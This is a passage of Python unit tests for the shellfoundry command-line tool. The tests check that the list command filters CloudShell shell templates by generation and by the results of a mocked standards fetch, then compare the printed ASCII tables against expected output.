@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
@patch('shellfoundry.commands.list_command.Configuration')
@patch.object(TemplateRetriever, '_get_min_cs_version')
@httpretty.activate
def test_templates_are_filtered_based_upon_the_result_of_cs_standards(self, _get_min_cs_version, conf_class,
max_width_mock, echo_mock):
# Arrange
_get_min_cs_version.return_value = None
configuration = MagicMock(read=MagicMock(return_value=MagicMock(online_mode="True")))
conf_class.return_value = configuration
max_width_mock.return_value = 40
templates = """templates:
- name : gen1/resource
description : base description
repository : https://github.com/QualiSystems/shell-resource-standard
params:
project_name :
min_cs_ver: 7.0
- name : gen1/switch
description : switch description
repository : https://github.com/QualiSystems/shell-switch-standard
params:
project_name :
min_cs_ver: 7.0
- name : gen2/resource
params:
project_name :
family_name:
description : 2nd generation shell template for a standard resource
repository : https://github.com/QualiSystems/shellfoundry-tosca-resource-template
min_cs_ver: 8.0
- name : gen2/networking/switch
params:
project_name :
family_name: Switch
description : 2nd generation shell template for a standard switch
repository : https://github.com/QualiSystems/shellfoundry-tosca-networking-template
min_cs_ver: 8.0
- name : gen2/networking/wireless-controller
params:
project_name :
family_name: WirelessController
description : 2nd generation shell template for a standard wireless controller
repository : https://github.com/QualiSystems/shellfoundry-tosca-networking-template
min_cs_ver: 8.0"""
flag_value = 'all'
standards = Mock()
standards.fetch.return_value = {"resource": ['5.0.0']}
template_retriever = FilteredTemplateRetriever(flag_value, TemplateRetriever())
httpretty.register_uri(httpretty.GET, TEMPLATES_YML, body=templates)
list_command_executor = ListCommandExecutor(template_retriever=template_retriever, standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(
u' Template Name CloudShell Ver. Description \n'
u'---------------------------------------------------------------------\n'
u' gen1/resource 7.0 and up base description \n'
u' gen1/switch 7.0 and up switch description \n'
u' gen2/resource 8.0 and up 2nd generation shell template for a \n'
u' standard resource ')
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
@patch('shellfoundry.commands.list_command.Configuration')
@patch.object(TemplateRetriever, '_get_min_cs_version')
@httpretty.activate
def test_templates_are_filtered_based_upon_the_result_of_cs_standards_gen2(self, _get_min_cs_version, conf_class,
max_width_mock, echo_mock):
# Arrange
_get_min_cs_version.return_value = None
configuration = MagicMock(read=MagicMock(return_value=MagicMock(online_mode="True")))
conf_class.return_value = configuration
max_width_mock.return_value = 40
templates = """templates:
- name : gen1/resource
description : base description
repository : https://github.com/QualiSystems/shell-resource-standard
params:
project_name :
min_cs_ver: 7.0
- name : gen1/switch
description : switch description
repository : https://github.com/QualiSystems/shell-switch-standard
params:
project_name :
min_cs_ver: 7.0
- name : gen2/resource
params:
project_name :
family_name:
description : 2nd generation shell template for a standard resource
repository : https://github.com/QualiSystems/shellfoundry-tosca-resource-template
min_cs_ver: 8.0
- name : gen2/networking/switch
params:
project_name :
family_name: Switch
description : 2nd generation shell template for a standard switch
repository : https://github.com/QualiSystems/shellfoundry-tosca-networking-template
min_cs_ver: 8.0
- name : gen2/networking/wireless-controller
params:
project_name :
family_name: WirelessController
description : 2nd generation shell template for a standard wireless controller
repository : https://github.com/QualiSystems/shellfoundry-tosca-networking-template
min_cs_ver: 8.0"""
flag_value = 'gen2'
standards = Mock()
standards.fetch.return_value = {"networking": ['5.0.0']}
template_retriever = FilteredTemplateRetriever(flag_value, TemplateRetriever())
httpretty.register_uri(httpretty.GET, TEMPLATES_YML, body=templates)
list_command_executor = ListCommandExecutor(template_retriever=template_retriever, standards=standards)
# Act
list_command_executor.list()
# Assert
echo_mock.assert_any_call(
u' Template Name CloudShell Ver. Description \n'
u'-------------------------------------------------------------------------------------------\n'
u' gen2/networking/switch 8.0 and up 2nd generation shell template for a \n'
u' standard switch \n'
u' gen2/networking/wireless-controller 8.0 and up 2nd generation shell template for a \n'
u' standard wireless controller ')
class TestListCommandWithFakeFs(fake_filesystem_unittest.TestCase):
def setUp(self):
self.setUpPyfakefs()
@staticmethod
def get_8_0_templates_output():
return (
u' Template Name CloudShell Ver. Description \n'
u'-------------------------------------------------------------------------------------------------------------------\n'
u' gen1/compute 7.0 and up 1st generation shell template for compute servers \n'
u' gen1/deployed-app 7.0 and up 1st generation shell template for a deployed app \n'
u' gen1/firewall 7.0 and up 1st generation shell template for a standard firewall \n'
u' gen1/networking/router 7.0 and up 1st generation shell template for a standard router \n'
u' gen1/networking/switch 7.0 and up 1st generation shell template for a standard switch \n'
u' gen1/pdu 7.0 and up 1st generation shell template for a standard pdu \n'
u' gen1/resource 7.0 and up 1st generation shell template for basic inventory resources \n'
u' gen1/resource-clean 7.0 and up 1st generation shell template for basic inventory resources \n'
u' (without sample commands) \n'
u' gen2/compute 8.0 and up 2nd generation shell template for compute servers \n'
u' gen2/deployed-app 8.0 and up 2nd generation shell template for a deployed app \n'
u' gen2/firewall 8.0 and up 2nd generation shell template for firewall resources \n'
u' gen2/networking/router 8.0 and up 2nd generation shell template for a standard router \n'
u' gen2/networking/switch 8.0 and up 2nd generation shell template for a standard switch \n'
u' gen2/networking/wireless-controller 8.0 and up 2nd generation shell template for a standard wireless \n'
u' controller \n'
u' gen2/pdu 8.0 and up 2nd generation shell template for a standard pdu \n'
u' gen2/resource 8.0 and up 2nd generation shell template for basic inventory resources \n'
u' layer-1-switch 7.0 and up A native shell template for layer 1 switches ')
@patch('click.echo')
@patch('shellfoundry.commands.list_command.AsciiTable.column_max_width')
def test_get_cs_standards_unavailable_shows_cs_8_0_shipped_templates(self, max_width_mock, echo_mock):
# Assert
max_width_mock.return_value = 60
from shellfoundry import ALTERNATIVE_TEMPLATES_PATH
self.fs.add_real_file(ALTERNATIVE_TEMPLATES_PATH)
standards = Mock(fetch=Mock(side_effect=FeatureUnavailable()))
template_retriever = FilteredTemplateRetriever('all', TemplateRetriever())
list_command_executor = ListCommandExecutor(template_retriever=template_retriever, standards=standards)
# Act
list_command_executor.list()
# Assert
templates_output = self.get_8_0_templates_output()
echo_mock.assert_any_call(templates_output)
| 54.507905
| 151
| 0.555346
| 2,589
| 27,581
| 5.722287
| 0.086906
| 0.008235
| 0.014985
| 0.043874
| 0.863989
| 0.857037
| 0.853729
| 0.846777
| 0.842727
| 0.81971
| 0
| 0.017849
| 0.339835
| 27,581
| 505
| 152
| 54.615842
| 0.795804
| 0.022624
| 0
| 0.747368
| 0
| 0.007895
| 0.488981
| 0.114237
| 0
| 0
| 0
| 0
| 0.034211
| 1
| 0.039474
| false
| 0
| 0.028947
| 0.002632
| 0.076316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.